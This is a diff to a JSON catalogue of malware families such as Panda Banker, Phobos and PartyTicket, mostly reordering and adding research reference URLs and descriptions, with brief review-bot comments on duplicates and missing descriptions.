- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
- "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
- "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html",
- "https://www.spamhaus.org/news/article/771/",
- "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html",
"https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/",
- "https://www.youtube.com/watch?v=J7VOfAJvxEY",
- "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
"https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf",
- "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
+ "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/",
+ "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/",
"https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html"
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.youtube.com/watch?v=J7VOfAJvxEY",
+ "https://www.spamhaus.org/news/article/771/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers",
+ "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker",
+ "https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html",
+ "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media"
],
"synonyms": [
"ZeusPanda"
@@ -35138,7 +36986,7 @@
"value": "PandaBanker"
},
{
- "description": "",
+ "description": "According to PCrisk, Panda is the name of a malicious program, which is classified as a stealer. It is a new variant of CollectorStealer.\r\n\r\nThe aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.\r\n\r\nThis piece of malicious software has been observed being actively distributed via spam campaigns - large-scale operations during which thousands of scam emails are sent. The spam mail proliferating Panda stealer heavily targeted users from the United States, Germany, Japan, and Australia.\r\n\r\nThe deceptive email letters concerned business-related topics (e.g., fake product quote requests, etc.). Panda stealer is a dangerous program, and as such - its infections must be removed immediately upon detection.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer",
@@ -35156,28 +37004,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora",
- "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/",
"https://www.fortinet.com/blog/threat-research/Using-emulation-against-anti-reverse-engineering-techniques",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/",
"https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://kienmanowar.wordpress.com/2022/03/21/quicknote-analysis-of-pandora-ransomware/",
+ "https://www.fortinet.com/blog/threat-research/looking-inside-pandoras-box",
+ "https://cloudsek.com/technical-analysis-of-emerging-sophisticated-pandora-ransomware-group/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://dissectingmalwa.re/blog/pandora/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2c215062-5739-4859-bd82-9639ae1d1756",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e43b67bc-3c16-4a69-b63d-f6bf3d732e1b",
"value": "Pandora"
},
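Review bot: After this hunk the Pandora `refs` list still carries the Microsoft ransomware-as-a-service URL twice, once with and once without a trailing slash (the unchanged `.../how-to-protect-yourself/` line and the re-added `.../how-to-protect-yourself` line); normalising trailing slashes before deduplicating would remove the duplicate. The `related` removal (dest-uuid `2c215062-5739-4859-bd82-9639ae1d1756`) has the same open question as the earlier hunks.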
@@ -35187,8 +37026,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pandora_rat",
"https://github.com/AZMagic/Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware"
+ "https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya"
],
"synonyms": [
"Pandora hVNC RAT"
@@ -35203,7 +37042,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paradies_clipper",
- "https://www.youtube.com/watch?v=wjoH9jW2EPQ"
+ "https://www.youtube.com/watch?v=wjoH9jW2EPQ",
+ "https://perception-point.io/blog/behind-the-attack-paradies-clipper-malware/"
],
"synonyms": [],
"type": []
@@ -35216,12 +37056,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise",
- "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
+ "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://asec.ahnlab.com/en/47590/",
"https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/",
- "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again",
+ "https://www.trendmicro.com/en_us/research/23/d/rapture-a-ransomware-family-with-similarities-to-paradise.html",
+ "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/",
"https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool",
- "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/"
+ "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again"
],
"synonyms": [],
"type": []
@@ -35234,12 +37076,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax",
- "https://blog.morphisec.com/parallax-rat-active-status",
- "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html",
"https://twitter.com/malwrhunterteam/status/1227196799997431809",
- "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
"https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://blog.morphisec.com/parallax-rat-active-status",
"https://www.bleepingcomputer.com/news/security/unskilled-hacker-linked-to-years-of-attacks-on-aviation-transport-sectors/",
+ "https://threatpost.com/ta2541-apt-rats-aviation/178422/",
+ "https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html",
+ "https://www.uptycs.com/blog/cryptocurrency-entities-at-risk-threat-actor-uses-parallax-rat-for-infiltration",
"https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/"
],
"synonyms": [
@@ -35268,30 +37111,34 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
"https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/",
- "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
- "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine",
"https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware",
- "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/",
+ "https://securelist.com/new-ransomware-trends-in-2022/106457/",
+ "https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf",
"https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html",
- "https://www.brighttalk.com/webcast/15591/534324"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/",
+ "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://www.mandiant.com/resources/information-operations-surrounding-ukraine",
+ "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/",
+ "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/",
+ "https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
],
"synonyms": [
"Elections GoRansom",
@@ -35321,12 +37168,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
"https://research.checkpoint.com/2020/ransomware-alert-pay2key/",
+ "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370",
+ "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
"https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf"
],
"synonyms": [
@@ -35355,8 +37202,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare",
- "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf",
+ "https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html"
],
"synonyms": [],
"type": []
@@ -35369,14 +37216,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash",
- "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
- "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
- "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
"https://www.us-cert.gov/ncas/analysis-reports/ar20-133c",
- "https://asec.ahnlab.com/en/30022/",
"https://blog.reversinglabs.com/blog/hidden-cobra",
- "https://asec.ahnlab.com/en/30532/"
+ "https://asec.ahnlab.com/en/30022/",
+ "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
+ "https://asec.ahnlab.com/en/30532/",
+ "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/"
],
"synonyms": [],
"type": []
@@ -35470,14 +37317,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.petya",
- "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/",
- "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
"https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
"https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html"
+ "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
+ "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
],
"synonyms": [],
"type": []
@@ -35518,12 +37366,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom",
"https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
+ "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/",
+ "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/",
- "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
],
"synonyms": [],
"type": []
@@ -35532,32 +37380,33 @@
"value": "Philadephia Ransom"
},
{
- "description": "Ransomware.",
+ "description": "MalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
- "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
"https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware",
- "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
"https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://paraflare.com/luci-spools-the-fun-with-phobos-ransomware/",
"https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/",
- "https://securelist.com/cis-ransomware/104452/"
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew",
+ "https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://cert.pl/en/posts/2023/02/breaking-phobos/"
],
"synonyms": [],
"type": []
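Review bot: the new description spells the vendor "MalwareBytes"; the company writes its name "Malwarebytes" (see the two blog.malwarebytes.com refs in this same block), so the string should be corrected before merge. The second sentence ("This isn't surprising, as hacked RDP servers are a cheap commodity ...") is the vendor's commentary rather than a fact about the family and could be trimmed to the first sentence, which is what an analyst needs. The remaining lines reorder existing refs and add `https://cert.pl/en/posts/2023/02/breaking-phobos/`.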
@@ -35570,10 +37419,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
"https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/"
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
+ "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass"
],
"synonyms": [],
"type": []
@@ -35587,10 +37436,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_locker",
"https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp"
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
@@ -35598,14 +37447,27 @@
"uuid": "58aff639-0eda-4a80-9fe8-22e0498af728",
"value": "Phoenix Locker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phonk",
+ "https://twitter.com/abuse_ch/status/1630111198036348928"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e0aa3f91-59d6-4344-bcc5-d602aaab21f9",
+ "value": "Phonk"
+ },
{
"description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal",
- "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf",
+ "https://www.secureworks.com/research/threat-profiles/tin-woodlawn",
"https://elastic.github.io/security-research/intelligence/2022/03/02.phoreal-targets-southeast-asia-financial-sector/article/",
- "https://www.secureworks.com/research/threat-profiles/tin-woodlawn"
+ "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf"
],
"synonyms": [
"Rizzo"
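Review bot: the new `Phonk` cluster ships with an empty `"description"` and only two refs, one of which is a tweet (`https://twitter.com/abuse_ch/status/1630111198036348928`). A one-line description taken from the Malpedia entry, and a web.archive.org snapshot of the tweet (this file already uses archived copies for other volatile links), would keep the entry usable if the tweet is deleted. The Phoreal part of this hunk is a pure reorder of existing refs.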
@@ -35620,24 +37482,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://twitter.com/_CPResearch_/status/1447852018794643457",
"https://research.checkpoint.com/2019/phorpiex-breakdown/",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/",
- "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
- "https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/",
- "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://bin.re/blog/phorpiex/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
"https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/",
- "https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/",
+ "https://www.johannesbader.ch/2016/02/phorpiex/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://research.checkpoint.com/2021/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/",
"https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://twitter.com/_CPResearch_/status/1447852018794643457",
- "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
